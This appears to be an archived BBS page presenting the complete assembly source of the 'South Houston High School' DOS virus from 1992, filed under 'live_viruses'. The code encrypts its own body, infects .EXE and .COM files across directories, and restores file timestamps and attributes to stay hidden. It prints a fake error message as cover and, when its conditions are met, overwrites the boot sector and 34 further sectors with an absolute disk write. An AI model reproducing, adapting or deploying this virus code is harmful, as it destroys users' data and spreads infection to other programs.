home *** CD-ROM | disk | FTP | other *** search

---

/ The Unsorted BBS Collection / thegreatunsorted.tar / thegreatunsorted / live_viruses / virus_collections / shhs.asm

< prev

next >

Wrap

Assembly Source File  |  1992-02-26  |  11KB  |  239 lines

---

1. ; Source code to South Houston High School virus ;
2.  
3. codeseg        segment
4.         assume    cs:codeseg, ds:codeseg
5.         org    100h
6.  
7. cr        equ    13
8. lf        equ    10
9. tab        equ    9
10.  
11. start:
12.                 call    encrypt_decrypt
13.                 jmp     random_mutation
14. encrypt_val     db      0
15.   
16. infect_file:
17.                 mov     bx,handle                       ; (648C:01F2=0)
18.                 push    bx                              ; Save handle
19.                 call    encrypt_decrypt                 ; encrypt code
20.                 pop     bx                              ; Restore handle
21.                 mov     cx,offset eof-offset start      ; Length of code
22.                 mov     dx,offset start                 ; Start of code
23.                 mov     ah,40h                          ; Write to handle BX
24.         int    21h                ; DOS Services  ah=function 40h
25.                             ;  write file cx=bytes, to ds:dx
26.                 call    encrypt_decrypt                 ; decrypt code
27.         mov    al,encrypt_val            ; AL= code #
28.         add    al,13                ; add 13
29.         adc    al,0                ; plus carry
30.         mov    encrypt_val,al            ; save new value
31.                 ret                                     ; Return
32.  
33.  
34. encrypt_decrypt:
35.                 mov     bx,offset encrypted             ; offset of encrypted
36.                                                         ; code in memory
37.                 mov     al,encrypt_val                  ; encryption value
38.         or    al,al                ; 0 ?
39.         jz    skipcryptor            ; Don't waste time
40. xor_loop:       xor     byte ptr [bx],al                ; modify byte
41.                 inc     bx                              ; next byte, please
42.         add    al,bh                ; adjust encryption key
43.                 cmp     bx,offset eof                   ; are we done yet?
44.                 jle     xor_loop                        ; Nope, keep goin'
45. skipcryptor:    ret                                     ; Yep, bye bye!
46.  
47.  
48.  
49. ; The code from here on is encrypted until run-time (except in the case of a
50. ; first-run copy).
51.  
52.  
53. encrypted:
54.  
55.   
56. exe_filespec    db      '*.EXE',0
57. com_filespec    db      '*.COM',0
58. newdir          db      '..',0
59. fake_msg        db      'Program too big to fit in memory',cr,lf,'$'
60. virus_msg       db      cr,lf,tab,'I',39,'m sorry, Dave... but '
61.                 db      'I',39,'m afraid I can',39,'t do that!',cr,lf,cr,lf
62.                 db      cr,lf,tab,'Dedicated to the dudes at SHHS'
63.                 db      cr,lf,tab,'The BOOT SECTOR Infector ...',cr,lf,'$'
64.  
65. random_mutation:  mov    si,offset fname            ; point to fname
66.         mov    di,offset tfname        ; point to tfname
67.         mov    cx,13                ; 13 chars
68.         rep    movsb                ; copy the string
69.  
70.         cmp     byte ptr encrypt_val,0          ; encryption value
71.                 je      install_val                     ; Jump if equal
72.                 mov     ah,2Ch                          ; Get time
73.                 int     21h                             ;  Call DOS to ^
74.                 cmp     dh,55                           ; more than 55 seconds?
75.                 jg      find_extension                  ; Yes: don't mutate
76.  
77. install_val:    or      dl,dl                           ; DL = 0 ?
78.                 jnz     skipmutation                    ; No need to mutate
79. skipmutation:   mov     encrypt_val,dl                  ; save code number
80.  
81. find_extension: mov     byte ptr files_found,0          ; Haven't found any yet
82.                 mov     byte ptr files_infected,3       ; No more than 3 files
83.                 mov     byte ptr success,0              ; No successful tries
84.  
85. find_exe:       mov     cx,27h                          ; attr: R/O,HID,SYS,ARC
86.                 mov     dx,offset exe_filespec          ; point to '*.EXE',0
87.                 mov     ah,4Eh                          ; Find first
88.                 int     21h                             ; DOS Services
89.  
90.                 jc      find_com                        ; No more?  Find EXE
91.                 call    find_healthy                    ; Find a healthy file
92.  
93. find_com:       mov     cx,27h                          ; attr: R/O,HID,SYS,ARC
94.                 mov     dx,offset com_filespec          ; point to '*.COM',0
95.                 mov     ah,4Eh                          ; Find first match
96.         int    21h                ; DOS Services  ah=function 4Eh
97.                             ;  find 1st filenam match @ds:dx
98.                 jc      chdir                           ; No more?  CD ..
99.                 call    find_healthy                    ; Start over
100.  
101. chdir:          mov     dx,offset newdir                ; point to '..',0
102.                 mov     ah,3Bh                          ; CHDIR ..
103.                 int     21h                             ; DOS Services
104.                 jnc     find_exe                        ; Look for EXEs
105.                 jmp     exit_virus                       ;
106.   
107. find_healthy:   mov     bx,80h                          ; points at DTA
108.                 mov     ax,[bx+15h]                     ; original attribute
109.                 mov     orig_attr,ax                    ; ^
110.                 mov     ax,[bx+16h]                     ; original time stamp
111.                 mov     orig_time,ax                    ; ^
112.                 mov     ax,[bx+18h]                     ; original date stamp
113.                 mov     orig_date,ax                    ; ^
114.                 mov     dx,9Eh                          ; filename
115.                 xor     cx,cx                           ; zero out attributes
116.                 mov     ax,4301h                        ; set attribute
117.                 int     21h                             ; DOS Services
118.  
119.                 mov     ax,3D02h                        ; Open file read&write
120.                 int     21h                             ; DOS Services
121.                 mov     handle,ax                       ; save file handle
122.                 mov     bx,ax                           ; place ^ in BX
123.                 mov     cx,20                           ; read in 20 chars
124.                 mov     dx,offset compare_buff          ; Points to buffer
125.                 mov     ah,3Fh                          ; Read file
126.                 int     21h                             ; DOS Services
127.  
128.                 mov     bx,offset compare_buff          ; Points to buffer
129.                 mov     ah,encrypt_val                  ; Encryption value
130.                 mov     [bx+offset encrypt_val-100h],ah ; Fill in the blank
131.                 mov     si,100h                         ; Point to code's start
132.                 mov     di,offset compare_buff          ; Point to buffer
133.  
134.                 repe    cmpsb                           ; Compare buff to code
135.                 jne     healthy                         ; Didn't match, jump...
136.  
137.                 call    close_file                      ; Close the file
138.                 inc     byte ptr files_found            ; Found one!
139. continue_search:  mov   ah,4Fh                          ; Find next
140.                 int     21h                             ; DOS Services
141.                 jnc     find_healthy                    ; Find more
142. no_more_found:  ret                                     ; RETurn
143.  
144. healthy:        mov     bx,handle                       ; (648C:01F2=0)
145.                 mov     ah,3Eh                          ; Close file
146.                 int     21h                             ; DOS Services
147.  
148.                 mov     ax,3D02h                        ; Open file read&write
149.                 mov     dx,9Eh                          ; Filename is ....
150.                 int     21h                             ; DOS Services
151.  
152.         mov    si,dx                ; Point to filename
153.         mov    di,offset fname            ; Point to fname
154.         mov    cx,13                ; Copy 13 chars
155.         rep    movsb                ; Copy filename
156.  
157.                 mov     handle,ax                       ; save handle
158.                 call    infect_file                     ; infect file
159.                 call    close_file                      ; close file
160.                 inc     byte ptr success                ; Success!!!
161.                 dec     byte ptr files_infected         ; We got one!
162.                 jz      exit_virus                      ; Jump if zero
163.                 jmp     short continue_search           ; Continue the search
164.  
165. close_file:     mov     bx,handle                       ; get handle
166.                 mov     cx,orig_time                    ; get original time
167.                 mov     dx,orig_date                    ; get original date
168.  
169.                 mov     ax,5701h                        ; set date/time stamp
170.                 int     21h                             ; DOS Services
171.  
172.                 mov     ah,3Eh                          ; close file
173.                 int     21h                             ; DOS Services
174.  
175.                 mov     cx,orig_attr                    ; get original attrib
176.                 mov     ax,4301h                        ; get/set attribute
177.                 mov     dx,9Eh                          ; point to filename
178.                 int     21h                             ; DOS Services
179.                 ret                                     ; RETurn
180.  
181. exit_virus:     cmp     byte ptr files_found,8          ; Found at least 8?
182.                 jl      print_fake                      ; No, keep low profile
183.                 cmp     byte ptr success,0              ; Got anything?
184.                 jg      print_fake                      ; Yep, cover it up
185.  
186.                 mov     ah,9                            ; Print string
187.                 mov     dx,offset virus_msg             ; Point to virus msg
188.                 int     21h                             ; DOS Services
189.  
190.         mov    ah,19h                ; Get current disk
191.         int    21h                ; Call DOS to ^
192.  
193.         mov    si,offset tfname        ; Point to tfname
194.         mov    di,offset fname            ; Point to fname
195.         mov    cx,13                ; Copy 13 chars
196.         rep    movsb                ; Copy filename
197.  
198.                 mov     bx,offset kbstr                 ; BX points to message
199.                 xor     dx,dx                           ; Start at boot sector
200.         mov    cx,35                ; 35 sectors
201.         int    26h                ; Absolute disk write, drive al
202.                 jmp     short terminate                 ; End of the line!
203.  
204. print_fake:     mov     ah,9                            ; Print string
205.                 mov     dx,offset fake_msg              ; DX points to fake msg
206.                 int     21h                             ; DOS Services
207.  
208. terminate:
209.                 mov     ax,305h                         ; Set typematic rate
210.                 mov     bx,31Fh                         ; Long delay, fast reps
211.                 int     16h                             ; Keyboard i/o call ^^
212.                 int     20h                             ; Terminate process
213.  
214. kbstr:        db    'Killed by: '            ;Killed by
215. fname:        db    '1st run copy',0        ;13 spaces for filename
216. ekbstr:        db    '$'                ;Terminator for string
217.  
218. eof:
219.  
220. ;These variables are for temporary use only and are therefore excluded from
221. ;encryption and writing to the disk (this saves time and space).
222.  
223. compare_buff    db      20 dup (?)
224. files_found     db      ?
225. files_infected  db      ?
226. orig_time       dw      ?
227. orig_date       dw      ?
228. orig_attr       dw      ?
229. handle          dw      ?
230. success         db      ?
231.  
232. tfname:        db    13 dup (?)
233.  
234. codeseg         ends
235.   
236.   
237.   
238.         end    start
239.